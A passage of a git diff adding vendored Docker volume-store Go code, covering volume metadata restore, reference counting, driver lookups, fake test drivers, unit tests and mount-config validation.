[]volumeMetadata + s.db.View(func(tx *bolt.Tx) error { + ls = listMeta(tx) + return nil + }) + + chRemove := make(chan *volumeMetadata, len(ls)) + var wg sync.WaitGroup + for _, meta := range ls { + wg.Add(1) + // this is potentially a very slow operation, so do it in a goroutine + go func(meta volumeMetadata) { + defer wg.Done() + + var v volume.Volume + var err error + if meta.Driver != "" { + v, err = lookupVolume(meta.Driver, meta.Name) + if err != nil && err != errNoSuchVolume { + logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", meta.Name).Warn("Error restoring volume") + return + } + if v == nil { + // doesn't exist in the driver, remove it from the db + chRemove <- &meta + return + } + } else { + v, err = s.getVolume(meta.Name) + if err != nil { + if err == errNoSuchVolume { + chRemove <- &meta + } + return + } + + meta.Driver = v.DriverName() + if err := s.setMeta(v.Name(), meta); err != nil { + logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", v.Name()).Warn("Error updating volume metadata on restore") + } + } + + // increment driver refcount + volumedrivers.CreateDriver(meta.Driver) + + // cache the volume + s.globalLock.Lock() + s.options[v.Name()] = meta.Options + s.labels[v.Name()] = meta.Labels + s.names[v.Name()] = v + s.globalLock.Unlock() + }(meta) + } + + wg.Wait() + close(chRemove) + s.db.Update(func(tx *bolt.Tx) error { + for meta := range chRemove { + if err := removeMeta(tx, meta.Name); err != nil { + logrus.WithField("volume", meta.Name).Warnf("Error removing stale entry from volume db: %v", err) + } + } + return nil + }) +} diff --git a/vendor/github.com/docker/docker/volume/store/store.go b/vendor/github.com/docker/docker/volume/store/store.go new file mode 100644 index 0000000000..38afd86f45 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store.go @@ -0,0 +1,649 @@ +package store + +import ( + "net" + "os" + "path/filepath" + "sync" + "time" + + "github.com/pkg/errors" + + "github.com/Sirupsen/logrus" + "github.com/boltdb/bolt" + "github.com/docker/docker/pkg/locker" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" +) + +const ( + volumeDataDir = "volumes" +) + +type volumeWrapper struct { + volume.Volume + labels map[string]string + scope string + options map[string]string +} + +func (v volumeWrapper) Options() map[string]string { + options := map[string]string{} + for key, value := range v.options { + options[key] = value + } + return options +} + +func (v volumeWrapper) Labels() map[string]string { + return v.labels +} + +func (v volumeWrapper) Scope() string { + return v.scope +} + +func (v volumeWrapper) CachedPath() string { + if vv, ok := v.Volume.(interface { + CachedPath() string + }); ok { + return vv.CachedPath() + } + return v.Volume.Path() +} + +// New initializes a VolumeStore to keep +// reference counting of volumes in the system. +func New(rootPath string) (*VolumeStore, error) { + vs := &VolumeStore{ + locks: &locker.Locker{}, + names: make(map[string]volume.Volume), + refs: make(map[string][]string), + labels: make(map[string]map[string]string), + options: make(map[string]map[string]string), + } + + if rootPath != "" { + // initialize metadata store + volPath := filepath.Join(rootPath, volumeDataDir) + if err := os.MkdirAll(volPath, 750); err != nil { + return nil, err + } + + dbPath := filepath.Join(volPath, "metadata.db") + + var err error + vs.db, err = bolt.Open(dbPath, 0600, &bolt.Options{Timeout: 1 * time.Second}) + if err != nil { + return nil, errors.Wrap(err, "error while opening volume store metadata database") + } + + // initialize volumes bucket + if err := vs.db.Update(func(tx *bolt.Tx) error { + if _, err := tx.CreateBucketIfNotExists(volumeBucketName); err != nil { + return errors.Wrap(err, "error while setting up volume store metadata database") + } + return nil + }); err != nil { + return nil, err + } + } + + vs.restore() + + return vs, nil +} + +func (s *VolumeStore) getNamed(name string) (volume.Volume, bool) { + s.globalLock.RLock() + v, exists := s.names[name] + s.globalLock.RUnlock() + return v, exists +} + +func (s *VolumeStore) setNamed(v volume.Volume, ref string) { + s.globalLock.Lock() + s.names[v.Name()] = v + if len(ref) > 0 { + s.refs[v.Name()] = append(s.refs[v.Name()], ref) + } + s.globalLock.Unlock() +} + +// getRefs gets the list of refs for a given name +// Callers of this function are expected to hold the name lock. +func (s *VolumeStore) getRefs(name string) []string { + s.globalLock.RLock() + refs := s.refs[name] + s.globalLock.RUnlock() + return refs +} + +// Purge allows the cleanup of internal data on docker in case +// the internal data is out of sync with volumes driver plugins. +func (s *VolumeStore) Purge(name string) { + s.globalLock.Lock() + v, exists := s.names[name] + if exists { + if _, err := volumedrivers.RemoveDriver(v.DriverName()); err != nil { + logrus.Error("Error dereferencing volume driver: %v", err) + } + } + if err := s.removeMeta(name); err != nil { + logrus.Errorf("Error removing volume metadata for volume %q: %v", name, err) + } + delete(s.names, name) + delete(s.refs, name) + delete(s.labels, name) + delete(s.options, name) + s.globalLock.Unlock() +} + +// VolumeStore is a struct that stores the list of volumes available and keeps track of their usage counts +type VolumeStore struct { + // locks ensures that only one action is being performed on a particular volume at a time without locking the entire store + // since actions on volumes can be quite slow, this ensures the store is free to handle requests for other volumes. + locks *locker.Locker + // globalLock is used to protect access to mutable structures used by the store object + globalLock sync.RWMutex + // names stores the volume name -> volume relationship. + // This is used for making lookups faster so we don't have to probe all drivers + names map[string]volume.Volume + // refs stores the volume name and the list of things referencing it + refs map[string][]string + // labels stores volume labels for each volume + labels map[string]map[string]string + // options stores volume options for each volume + options map[string]map[string]string + db *bolt.DB +} + +// List proxies to all registered volume drivers to get the full list of volumes +// If a driver returns a volume that has name which conflicts with another volume from a different driver, +// the first volume is chosen and the conflicting volume is dropped. +func (s *VolumeStore) List() ([]volume.Volume, []string, error) { + vols, warnings, err := s.list() + if err != nil { + return nil, nil, &OpErr{Err: err, Op: "list"} + } + var out []volume.Volume + + for _, v := range vols { + name := normaliseVolumeName(v.Name()) + + s.locks.Lock(name) + storedV, exists := s.getNamed(name) + // Note: it's not safe to populate the cache here because the volume may have been + // deleted before we acquire a lock on its name + if exists && storedV.DriverName() != v.DriverName() { + logrus.Warnf("Volume name %s already exists for driver %s, not including volume returned by %s", v.Name(), storedV.DriverName(), v.DriverName()) + s.locks.Unlock(v.Name()) + continue + } + + out = append(out, v) + s.locks.Unlock(v.Name()) + } + return out, warnings, nil +} + +// list goes through each volume driver and asks for its list of volumes. +func (s *VolumeStore) list() ([]volume.Volume, []string, error) { + var ( + ls []volume.Volume + warnings []string + ) + + drivers, err := volumedrivers.GetAllDrivers() + if err != nil { + return nil, nil, err + } + + type vols struct { + vols []volume.Volume + err error + driverName string + } + chVols := make(chan vols, len(drivers)) + + for _, vd := range drivers { + go func(d volume.Driver) { + vs, err := d.List() + if err != nil { + chVols <- vols{driverName: d.Name(), err: &OpErr{Err: err, Name: d.Name(), Op: "list"}} + return + } + for i, v := range vs { + s.globalLock.RLock() + vs[i] = volumeWrapper{v, s.labels[v.Name()], d.Scope(), s.options[v.Name()]} + s.globalLock.RUnlock() + } + + chVols <- vols{vols: vs} + }(vd) + } + + badDrivers := make(map[string]struct{}) + for i := 0; i < len(drivers); i++ { + vs := <-chVols + + if vs.err != nil { + warnings = append(warnings, vs.err.Error()) + badDrivers[vs.driverName] = struct{}{} + logrus.Warn(vs.err) + } + ls = append(ls, vs.vols...) + } + + if len(badDrivers) > 0 { + s.globalLock.RLock() + for _, v := range s.names { + if _, exists := badDrivers[v.DriverName()]; exists { + ls = append(ls, v) + } + } + s.globalLock.RUnlock() + } + return ls, warnings, nil +} + +// CreateWithRef creates a volume with the given name and driver and stores the ref +// This ensures there's no race between creating a volume and then storing a reference. +func (s *VolumeStore) CreateWithRef(name, driverName, ref string, opts, labels map[string]string) (volume.Volume, error) { + name = normaliseVolumeName(name) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + v, err := s.create(name, driverName, opts, labels) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "create"} + } + + s.setNamed(v, ref) + return v, nil +} + +// Create creates a volume with the given name and driver. +// This is just like CreateWithRef() except we don't store a reference while holding the lock. +func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { + return s.CreateWithRef(name, driverName, "", opts, labels) +} + +// checkConflict checks the local cache for name collisions with the passed in name, +// for existing volumes with the same name but in a different driver. +// This is used by `Create` as a best effort to prevent name collisions for volumes. +// If a matching volume is found that is not a conflict that is returned so the caller +// does not need to perform an additional lookup. +// When no matching volume is found, both returns will be nil +// +// Note: This does not probe all the drivers for name collisions because v1 plugins +// are very slow, particularly if the plugin is down, and cause other issues, +// particularly around locking the store. +// TODO(cpuguy83): With v2 plugins this shouldn't be a problem. Could also potentially +// use a connect timeout for this kind of check to ensure we aren't blocking for a +// long time. +func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, error) { + // check the local cache + v, _ := s.getNamed(name) + if v == nil { + return nil, nil + } + + vDriverName := v.DriverName() + var conflict bool + if driverName != "" { + // Retrieve canonical driver name to avoid inconsistencies (for example + // "plugin" vs. "plugin:latest") + vd, err := volumedrivers.GetDriver(driverName) + if err != nil { + return nil, err + } + + if vDriverName != vd.Name() { + conflict = true + } + } + + // let's check if the found volume ref + // is stale by checking with the driver if it still exists + exists, err := volumeExists(v) + if err != nil { + return nil, errors.Wrapf(errNameConflict, "found reference to volume '%s' in driver '%s', but got an error while checking the driver: %v", name, vDriverName, err) + } + + if exists { + if conflict { + return nil, errors.Wrapf(errNameConflict, "driver '%s' already has volume '%s'", vDriverName, name) + } + return v, nil + } + + if len(s.getRefs(v.Name())) > 0 { + // Containers are referencing this volume but it doesn't seem to exist anywhere. + // Return a conflict error here, the user can fix this with `docker volume rm -f` + return nil, errors.Wrapf(errNameConflict, "found references to volume '%s' in driver '%s' but the volume was not found in the driver -- you may need to remove containers referencing this volume or force remove the volume to re-create it", name, vDriverName) + } + + // doesn't exist, so purge it from the cache + s.Purge(name) + return nil, nil +} + +// volumeExists returns if the volume is still present in the driver. +// An error is returned if there was an issue communicating with the driver. +func volumeExists(v volume.Volume) (bool, error) { + exists, err := lookupVolume(v.DriverName(), v.Name()) + if err != nil { + return false, err + } + return exists != nil, nil +} + +// create asks the given driver to create a volume with the name/opts. +// If a volume with the name is already known, it will ask the stored driver for the volume. +// If the passed in driver name does not match the driver name which is stored +// for the given volume name, an error is returned after checking if the reference is stale. +// If the reference is stale, it will be purged and this create can continue. +// It is expected that callers of this function hold any necessary locks. +func (s *VolumeStore) create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { + // Validate the name in a platform-specific manner + valid, err := volume.IsVolumeNameValid(name) + if err != nil { + return nil, err + } + if !valid { + return nil, &OpErr{Err: errInvalidName, Name: name, Op: "create"} + } + + v, err := s.checkConflict(name, driverName) + if err != nil { + return nil, err + } + + if v != nil { + return v, nil + } + + // Since there isn't a specified driver name, let's see if any of the existing drivers have this volume name + if driverName == "" { + v, _ := s.getVolume(name) + if v != nil { + return v, nil + } + } + + vd, err := volumedrivers.CreateDriver(driverName) + + if err != nil { + return nil, &OpErr{Op: "create", Name: name, Err: err} + } + + logrus.Debugf("Registering new volume reference: driver %q, name %q", vd.Name(), name) + + if v, _ := vd.Get(name); v != nil { + return v, nil + } + v, err = vd.Create(name, opts) + if err != nil { + return nil, err + } + s.globalLock.Lock() + s.labels[name] = labels + s.options[name] = opts + s.globalLock.Unlock() + + metadata := volumeMetadata{ + Name: name, + Driver: vd.Name(), + Labels: labels, + Options: opts, + } + + if err := s.setMeta(name, metadata); err != nil { + return nil, err + } + return volumeWrapper{v, labels, vd.Scope(), opts}, nil +} + +// GetWithRef gets a volume with the given name from the passed in driver and stores the ref +// This is just like Get(), but we store the reference while holding the lock. +// This makes sure there are no races between checking for the existence of a volume and adding a reference for it +func (s *VolumeStore) GetWithRef(name, driverName, ref string) (volume.Volume, error) { + name = normaliseVolumeName(name) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + vd, err := volumedrivers.GetDriver(driverName) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "get"} + } + + v, err := vd.Get(name) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "get"} + } + + s.setNamed(v, ref) + + s.globalLock.RLock() + defer s.globalLock.RUnlock() + return volumeWrapper{v, s.labels[name], vd.Scope(), s.options[name]}, nil +} + +// Get looks if a volume with the given name exists and returns it if so +func (s *VolumeStore) Get(name string) (volume.Volume, error) { + name = normaliseVolumeName(name) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + v, err := s.getVolume(name) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "get"} + } + s.setNamed(v, "") + return v, nil +} + +// getVolume requests the volume, if the driver info is stored it just accesses that driver, +// if the driver is unknown it probes all drivers until it finds the first volume with that name. +// it is expected that callers of this function hold any necessary locks +func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { + var meta volumeMetadata + meta, err := s.getMeta(name) + if err != nil { + return nil, err + } + + driverName := meta.Driver + if driverName == "" { + s.globalLock.RLock() + v, exists := s.names[name] + s.globalLock.RUnlock() + if exists { + meta.Driver = v.DriverName() + if err := s.setMeta(name, meta); err != nil { + return nil, err + } + } + } + + if meta.Driver != "" { + vol, err := lookupVolume(meta.Driver, name) + if err != nil { + return nil, err + } + if vol == nil { + s.Purge(name) + return nil, errNoSuchVolume + } + + var scope string + vd, err := volumedrivers.GetDriver(meta.Driver) + if err == nil { + scope = vd.Scope() + } + return volumeWrapper{vol, meta.Labels, scope, meta.Options}, nil + } + + logrus.Debugf("Probing all drivers for volume with name: %s", name) + drivers, err := volumedrivers.GetAllDrivers() + if err != nil { + return nil, err + } + + for _, d := range drivers { + v, err := d.Get(name) + if err != nil || v == nil { + continue + } + meta.Driver = v.DriverName() + if err := s.setMeta(name, meta); err != nil { + return nil, err + } + return volumeWrapper{v, meta.Labels, d.Scope(), meta.Options}, nil + } + return nil, errNoSuchVolume +} + +// lookupVolume gets the specified volume from the specified driver. +// This will only return errors related to communications with the driver. +// If the driver returns an error that is not communication related the +// error is logged but not returned. +// If the volume is not found it will return `nil, nil`` +func lookupVolume(driverName, volumeName string) (volume.Volume, error) { + vd, err := volumedrivers.GetDriver(driverName) + if err != nil { + return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName) + } + v, err := vd.Get(volumeName) + if err != nil { + err = errors.Cause(err) + if _, ok := err.(net.Error); ok { + return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", v.Name(), v.DriverName()) + } + + // At this point, the error could be anything from the driver, such as "no such volume" + // Let's not check an error here, and instead check if the driver returned a volume + logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Warnf("Error while looking up volume") + } + return v, nil +} + +// Remove removes the requested volume. A volume is not removed if it has any refs +func (s *VolumeStore) Remove(v volume.Volume) error { + name := normaliseVolumeName(v.Name()) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + refs := s.getRefs(name) + if len(refs) > 0 { + return &OpErr{Err: errVolumeInUse, Name: v.Name(), Op: "remove", Refs: refs} + } + + vd, err := volumedrivers.GetDriver(v.DriverName()) + if err != nil { + return &OpErr{Err: err, Name: vd.Name(), Op: "remove"} + } + + logrus.Debugf("Removing volume reference: driver %s, name %s", v.DriverName(), name) + vol := unwrapVolume(v) + if err := vd.Remove(vol); err != nil { + return &OpErr{Err: err, Name: name, Op: "remove"} + } + + s.Purge(name) + return nil +} + +// Dereference removes the specified reference to the volume +func (s *VolumeStore) Dereference(v volume.Volume, ref string) { + s.locks.Lock(v.Name()) + defer s.locks.Unlock(v.Name()) + + s.globalLock.Lock() + defer s.globalLock.Unlock() + var refs []string + + for _, r := range s.refs[v.Name()] { + if r != ref { + refs = append(refs, r) + } + } + s.refs[v.Name()] = refs +} + +// Refs gets the current list of refs for the given volume +func (s *VolumeStore) Refs(v volume.Volume) []string { + s.locks.Lock(v.Name()) + defer s.locks.Unlock(v.Name()) + + refs := s.getRefs(v.Name()) + refsOut := make([]string, len(refs)) + copy(refsOut, refs) + return refsOut +} + +// FilterByDriver returns the available volumes filtered by driver name +func (s *VolumeStore) FilterByDriver(name string) ([]volume.Volume, error) { + vd, err := volumedrivers.GetDriver(name) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "list"} + } + ls, err := vd.List() + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "list"} + } + for i, v := range ls { + options := map[string]string{} + s.globalLock.RLock() + for key, value := range s.options[v.Name()] { + options[key] = value + } + ls[i] = volumeWrapper{v, s.labels[v.Name()], vd.Scope(), options} + s.globalLock.RUnlock() + } + return ls, nil +} + +// FilterByUsed returns the available volumes filtered by if they are in use or not. +// `used=true` returns only volumes that are being used, while `used=false` returns +// only volumes that are not being used. +func (s *VolumeStore) FilterByUsed(vols []volume.Volume, used bool) []volume.Volume { + return s.filter(vols, func(v volume.Volume) bool { + s.locks.Lock(v.Name()) + l := len(s.getRefs(v.Name())) + s.locks.Unlock(v.Name()) + if (used && l > 0) || (!used && l == 0) { + return true + } + return false + }) +} + +// filterFunc defines a function to allow filter volumes in the store +type filterFunc func(vol volume.Volume) bool + +// filter returns the available volumes filtered by a filterFunc function +func (s *VolumeStore) filter(vols []volume.Volume, f filterFunc) []volume.Volume { + var ls []volume.Volume + for _, v := range vols { + if f(v) { + ls = append(ls, v) + } + } + return ls +} + +func unwrapVolume(v volume.Volume) volume.Volume { + if vol, ok := v.(volumeWrapper); ok { + return vol.Volume + } + + return v +} + +// Shutdown releases all resources used by the volume store +// It does not make any changes to volumes, drivers, etc. +func (s *VolumeStore) Shutdown() error { + return s.db.Close() +} diff --git a/vendor/github.com/docker/docker/volume/store/store_test.go b/vendor/github.com/docker/docker/volume/store/store_test.go new file mode 100644 index 0000000000..b52f720ca1 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store_test.go @@ -0,0 +1,234 @@ +package store + +import ( + "errors" + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/volume/drivers" + volumetestutils "github.com/docker/docker/volume/testutils" +) + +func TestCreate(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + defer volumedrivers.Unregister("fake") + dir, err := ioutil.TempDir("", "test-create") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + v, err := s.Create("fake1", "fake", nil, nil) + if err != nil { + t.Fatal(err) + } + if v.Name() != "fake1" { + t.Fatalf("Expected fake1 volume, got %v", v) + } + if l, _, _ := s.List(); len(l) != 1 { + t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l) + } + + if _, err := s.Create("none", "none", nil, nil); err == nil { + t.Fatalf("Expected unknown driver error, got nil") + } + + _, err = s.Create("fakeerror", "fake", map[string]string{"error": "create error"}, nil) + expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")} + if err != nil && err.Error() != expected.Error() { + t.Fatalf("Expected create fakeError: create error, got %v", err) + } +} + +func TestRemove(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + defer volumedrivers.Unregister("fake") + defer volumedrivers.Unregister("noop") + dir, err := ioutil.TempDir("", "test-remove") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + // doing string compare here since this error comes directly from the driver + expected := "no such volume" + if err := s.Remove(volumetestutils.NoopVolume{}); err == nil || !strings.Contains(err.Error(), expected) { + t.Fatalf("Expected error %q, got %v", expected, err) + } + + v, err := s.CreateWithRef("fake1", "fake", "fake", nil, nil) + if err != nil { + t.Fatal(err) + } + + if err := s.Remove(v); !IsInUse(err) { + t.Fatalf("Expected ErrVolumeInUse error, got %v", err) + } + s.Dereference(v, "fake") + if err := s.Remove(v); err != nil { + t.Fatal(err) + } + if l, _, _ := s.List(); len(l) != 0 { + t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l) + } +} + +func TestList(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2") + defer volumedrivers.Unregister("fake") + defer volumedrivers.Unregister("fake2") + dir, err := ioutil.TempDir("", "test-list") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir) + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + if _, err := s.Create("test", "fake", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("test2", "fake2", nil, nil); err != nil { + t.Fatal(err) + } + + ls, _, err := s.List() + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } + if err := s.Shutdown(); err != nil { + t.Fatal(err) + } + + // and again with a new store + s, err = New(dir) + if err != nil { + t.Fatal(err) + } + ls, _, err = s.List() + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } +} + +func TestFilterByDriver(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + defer volumedrivers.Unregister("fake") + defer volumedrivers.Unregister("noop") + dir, err := ioutil.TempDir("", "test-filter-driver") + if err != nil { + t.Fatal(err) + } + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + if _, err := s.Create("fake1", "fake", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("fake2", "fake", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("fake3", "noop", nil, nil); err != nil { + t.Fatal(err) + } + + if l, _ := s.FilterByDriver("fake"); len(l) != 2 { + t.Fatalf("Expected 2 volumes, got %v, %v", len(l), l) + } + + if l, _ := s.FilterByDriver("noop"); len(l) != 1 { + t.Fatalf("Expected 1 volume, got %v, %v", len(l), l) + } +} + +func TestFilterByUsed(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + dir, err := ioutil.TempDir("", "test-filter-used") + if err != nil { + t.Fatal(err) + } + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + if _, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil); err != nil { + t.Fatal(err) + } + if _, err := s.Create("fake2", "fake", nil, nil); err != nil { + t.Fatal(err) + } + + vols, _, err := s.List() + if err != nil { + t.Fatal(err) + } + + dangling := s.FilterByUsed(vols, false) + if len(dangling) != 1 { + t.Fatalf("expected 1 danging volume, got %v", len(dangling)) + } + if dangling[0].Name() != "fake2" { + t.Fatalf("expected danging volume fake2, got %s", dangling[0].Name()) + } + + used := s.FilterByUsed(vols, true) + if len(used) != 1 { + t.Fatalf("expected 1 used volume, got %v", len(used)) + } + if used[0].Name() != "fake1" { + t.Fatalf("expected used volume fake1, got %s", used[0].Name()) + } +} + +func TestDerefMultipleOfSameRef(t *testing.T) { + volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + dir, err := ioutil.TempDir("", "test-same-deref") + if err != nil { + t.Fatal(err) + } + + s, err := New(dir) + if err != nil { + t.Fatal(err) + } + + v, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil) + if err != nil { + t.Fatal(err) + } + + if _, err := s.GetWithRef("fake1", "fake", "volReference"); err != nil { + t.Fatal(err) + } + + s.Dereference(v, "volReference") + if err := s.Remove(v); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/volume/store/store_unix.go b/vendor/github.com/docker/docker/volume/store/store_unix.go new file mode 100644 index 0000000000..8ebc1f20c7 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store_unix.go @@ -0,0 +1,9 @@ +// +build linux freebsd solaris + +package store + +// normaliseVolumeName is a platform specific function to normalise the name +// of a volume. This is a no-op on Unix-like platforms +func normaliseVolumeName(name string) string { + return name +} diff --git a/vendor/github.com/docker/docker/volume/store/store_windows.go b/vendor/github.com/docker/docker/volume/store/store_windows.go new file mode 100644 index 0000000000..8601cdd5cf --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store_windows.go @@ -0,0 +1,12 @@ +package store + +import "strings" + +// normaliseVolumeName is a platform specific function to normalise the name +// of a volume. On Windows, as NTFS is case insensitive, under +// c:\ProgramData\Docker\Volumes\, the folders John and john would be synonymous. +// Hence we can't allow the volume "John" and "john" to be created as separate +// volumes. +func normaliseVolumeName(name string) string { + return strings.ToLower(name) +} diff --git a/vendor/github.com/docker/docker/volume/testutils/testutils.go b/vendor/github.com/docker/docker/volume/testutils/testutils.go new file mode 100644 index 0000000000..2dbac02fdb --- /dev/null +++ b/vendor/github.com/docker/docker/volume/testutils/testutils.go @@ -0,0 +1,116 @@ +package testutils + +import ( + "fmt" + + "github.com/docker/docker/volume" +) + +// NoopVolume is a volume that doesn't perform any operation +type NoopVolume struct{} + +// Name is the name of the volume +func (NoopVolume) Name() string { return "noop" } + +// DriverName is the name of the driver +func (NoopVolume) DriverName() string { return "noop" } + +// Path is the filesystem path to the volume +func (NoopVolume) Path() string { return "noop" } + +// Mount mounts the volume in the container +func (NoopVolume) Mount(_ string) (string, error) { return "noop", nil } + +// Unmount unmounts the volume from the container +func (NoopVolume) Unmount(_ string) error { return nil } + +// Status proivdes low-level details about the volume +func (NoopVolume) Status() map[string]interface{} { return nil } + +// FakeVolume is a fake volume with a random name +type FakeVolume struct { + name string + driverName string +} + +// NewFakeVolume creates a new fake volume for testing +func NewFakeVolume(name string, driverName string) volume.Volume { + return FakeVolume{name: name, driverName: driverName} +} + +// Name is the name of the volume +func (f FakeVolume) Name() string { return f.name } + +// DriverName is the name of the driver +func (f FakeVolume) DriverName() string { return f.driverName } + +// Path is the filesystem path to the volume +func (FakeVolume) Path() string { return "fake" } + +// Mount mounts the volume in the container +func (FakeVolume) Mount(_ string) (string, error) { return "fake", nil } + +// Unmount unmounts the volume from the container +func (FakeVolume) Unmount(_ string) error { return nil } + +// Status proivdes low-level details about the volume +func (FakeVolume) Status() map[string]interface{} { return nil } + +// FakeDriver is a driver that generates fake volumes +type FakeDriver struct { + name string + vols map[string]volume.Volume +} + +// NewFakeDriver creates a new FakeDriver with the specified name +func NewFakeDriver(name string) volume.Driver { + return &FakeDriver{ + name: name, + vols: make(map[string]volume.Volume), + } +} + +// Name is the name of the driver +func (d *FakeDriver) Name() string { return d.name } + +// Create initializes a fake volume. +// It returns an error if the options include an "error" key with a message +func (d *FakeDriver) Create(name string, opts map[string]string) (volume.Volume, error) { + if opts != nil && opts["error"] != "" { + return nil, fmt.Errorf(opts["error"]) + } + v := NewFakeVolume(name, d.name) + d.vols[name] = v + return v, nil +} + +// Remove deletes a volume. +func (d *FakeDriver) Remove(v volume.Volume) error { + if _, exists := d.vols[v.Name()]; !exists { + return fmt.Errorf("no such volume") + } + delete(d.vols, v.Name()) + return nil +} + +// List lists the volumes +func (d *FakeDriver) List() ([]volume.Volume, error) { + var vols []volume.Volume + for _, v := range d.vols { + vols = append(vols, v) + } + return vols, nil +} + +// Get gets the volume +func (d *FakeDriver) Get(name string) (volume.Volume, error) { + if v, exists := d.vols[name]; exists { + return v, nil + } + return nil, fmt.Errorf("no such volume") +} + +// Scope returns the local scope +func (*FakeDriver) Scope() string { + return "local" +} diff --git a/vendor/github.com/docker/docker/volume/validate.go b/vendor/github.com/docker/docker/volume/validate.go new file mode 100644 index 0000000000..27a8c5d5b0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/validate.go @@ -0,0 +1,125 @@ +package volume + +import ( + "errors" + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/api/types/mount" +) + +var errBindNotExist = errors.New("bind source path does not exist") + +type validateOpts struct { + skipBindSourceCheck bool + skipAbsolutePathCheck bool +} + +func validateMountConfig(mnt *mount.Mount, options ...func(*validateOpts)) error { + opts := validateOpts{} + for _, o := range options { + o(&opts) + } + + if len(mnt.Target) == 0 { + return &errMountConfig{mnt, errMissingField("Target")} + } + + if err := validateNotRoot(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + + if !opts.skipAbsolutePathCheck { + if err := validateAbsolute(mnt.Target); err != nil { + return &errMountConfig{mnt, err} + } + } + + switch mnt.Type { + case mount.TypeBind: + if len(mnt.Source) == 0 { + return &errMountConfig{mnt, errMissingField("Source")} + } + // Don't error out just because the propagation mode is not supported on the platform + if opts := mnt.BindOptions; opts != nil { + if len(opts.Propagation) > 0 && len(propagationModes) > 0 { + if _, ok := propagationModes[opts.Propagation]; !ok { + return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} + } + } + } + if mnt.VolumeOptions != nil { + return &errMountConfig{mnt, errExtraField("VolumeOptions")} + } + + if err := validateAbsolute(mnt.Source); err != nil { + return &errMountConfig{mnt, err} + } + + // Do not allow binding to non-existent path + if !opts.skipBindSourceCheck { + fi, err := os.Stat(mnt.Source) + if err != nil { + if !os.IsNotExist(err) { + return &errMountConfig{mnt, err} + } + return &errMountConfig{mnt, errBindNotExist} + } + if err := validateStat(fi); err != nil { + return &errMountConfig{mnt, err} + } + } + case mount.TypeVolume: + if mnt.BindOptions != nil { + return &errMountConfig{mnt, errExtraField("BindOptions")} + } + + if len(mnt.Source) == 0 && mnt.ReadOnly { + return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} + } + + if len(mnt.Source) != 0 { + if valid, err := IsVolumeNameValid(mnt.Source); !valid { + if err == nil { + err = errors.New("invalid volume name") + } + return &errMountConfig{mnt, err} + } + } + case mount.TypeTmpfs: + if len(mnt.Source) != 0 { + return &errMountConfig{mnt, errExtraField("Source")} + } + if _, err := ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil { + return &errMountConfig{mnt, err} + } + default: + return &errMountConfig{mnt, errors.New("mount type unknown")} + } + return nil +} + +type errMountConfig struct { + mount *mount.Mount + err error +} + +func (e *errMountConfig) Error() string { + return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error()) +} + +func 